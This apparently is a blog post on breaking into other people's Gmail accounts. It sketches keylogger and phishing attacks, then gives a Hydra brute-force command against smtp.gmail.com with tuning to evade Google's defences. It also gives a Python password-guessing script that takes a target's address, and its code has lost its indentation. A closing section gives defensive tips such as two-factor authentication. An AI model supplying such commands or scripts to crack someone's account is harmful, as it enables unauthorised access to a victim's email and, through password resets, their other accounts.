hack-gmail-735x400

Hacking GMail Accounts

Share This:

A question that is often asked is how to hack a gmail account. Or how to crack a gmail password. If you use Google and search for this information you will find numerous websites that claim they have software that can do just this. They then charge you $100+ with a disclaimer that says there is no guarantee this will work. Very true and most of the times they know there is about 100% chance that their software wont deliver because they developed it to scam you.

This isn’t to say hacking a gmail account isn’t possible. But it is to say it isn’t quite as easy as these sites make it seem. Trust me Google would be out of business if it where easy. Below I will talk about some ways of hacking a Gmail account I will then talk about how to secure your account to prevent such attacks from happening.

Disclaimer: The following information is for educational purposes only. I’m not responsible if you choose to use the methods mentioned for malicious purposes.

Keyloggers

One of the most common ways is to use a keylogger. Trick your victim into downloading a file that will result in everything they type on their computer to be recorded and sent to you. This includes passwords.




Phishing

Setup a phishing site that appears to be Google. And have them attempt to login to the site. Once they type their username and password you get the username and password allowing you to access their gmail account.




Bruteforce

Bruteforce the password. Many people use human readable passwords. Such as a word or a name and maybe some numbers and special characters. Because of this huge word list have been created for password cracking. Their are many tools you can use these wordlist on. Below are two examples.

Hydra

Hydra allows you to provide a list of user names and a password list to use for hacking. Hydra can be used for pretty much any website. A basic example of using hydra to crack a password is as follows.

hydra -S -l <email> -P <filepath/yourlist.txt> -e s -V -s 465 smtp.gmail.com smtp

If you can’t understand the above command. It is pretty basic. Your executing hydra, and telling hydra to use SSL this is the -S in the command. Your telling hydra the login name using the -l obviously we type the email address of the victim and not <email>. Then we tell hydra the wordlist we wish to use using the -P. The <filepath/yourlist.txt> is changed to the location of your wordlist. We also want hydra to try to login as the password. This is done using -e s, we also want hydra to show all attempts it has made using -V and we want it do this on port 465 which is done with -s. The server this is done on is smtp.gmail.com




Hydra does have many limitations. One of which is the size you are allowed to use with a wordlist. Because of this you may want to split the wordlist up and run hydra many times. The above method can be applied to any web based login system.

Hydra pretty much uses POST methods to send information to the server. The response from the server is usually human readable not machine readable. Because of this if you where doing what hydra does you may get something like Bad Request everytime it used the wrong password. Google and other sites recognize such activity by hydra and similar software, and they have implemented methods to throw these programs off. For example Google might change Bad Request to Very Bad Request which Hydra is looking for Bad Request and anything other then Bad Request will show up as a correct request. Meaning Hydra will give many false positives. One way to prevent this is to change the number of task to 20 by using the -t 20 in the command and then changing the timeout to 50 by using the -w 50 in your command.




Understanding how Hydra works means any hacker with malicious intentions can create a script that doesn’t have the wordlist limitations hydra has. Below is a python script that I have been able to use a 15GB wordlist on.


import smtplib
import time
smtpserver = smtplib.SMTP("smtp.gmail.com", 465)
smtpserver.ehlo()
smtpserver.starttls()
user = raw_input("Enter the target's email address: ")
passwfile = raw_input("Enter the password file name: ")
passwfile = open(passwfile, "r")
for password in passwfile:
time.sleep(20)
try:
smtpserver.login(user, password)
print "[+] Password Found: %s" % password
break;
except smtplib.SMTPAuthenticationError:
print "[!] Password Incorrect: %s" % password

Of course you can change time.sleep(20) to sleep longer the 20 seconds or less then 20 seconds. But lets keep in mind with 20 seconds on my computer it takes 62 days with the programming running nonstop to achieve this goal. However without a decent timeout the program will halt do to anti-hacking systems setup by Google and many other sites.

Preventing Attacks

Your E-Mail is the most important account you have on the internet. If someone gains access to it they can go to what ever other site you are registered with and request a password reset and gain access to those accounts as well. Because of this it is vital to make sure you take the proper procausions to protect your E-Mail.




Never click on a link your never 100% certain about. Pay close attention to the address in the address bar. If a link looks like goog1e.com and it is supposed to be google.com chances are it is a fake Google site designed to phish for your information. Also make sure that your logging into a secure service. Most well known websites will use the SSL protocol to log you in. So look at the URL and make sure it has HTTPS in front of it.

Make sure your system is clean of any malicious software. And isn’t sending data to locations your unfamiliar with. If it is you may have a hooked keyboard that is recording your keystrokes. Running routine scans is always best practice for Windows, Mac and Linux users.




Download several wordlist online and search them for the passwords you use. If your password appears in the wordlist then don’t use the password anymore. Also use passwords that are more then 30 characters long, and have special characters and also use alt keycodes.

Gmail offers Two Factor Authentication. If you have a cellphone it is advisable to set it up. It can be annoying but it is safe. Two factor authentication means even if the attacker has your password they need physical access to your cellphone in order to login using your password.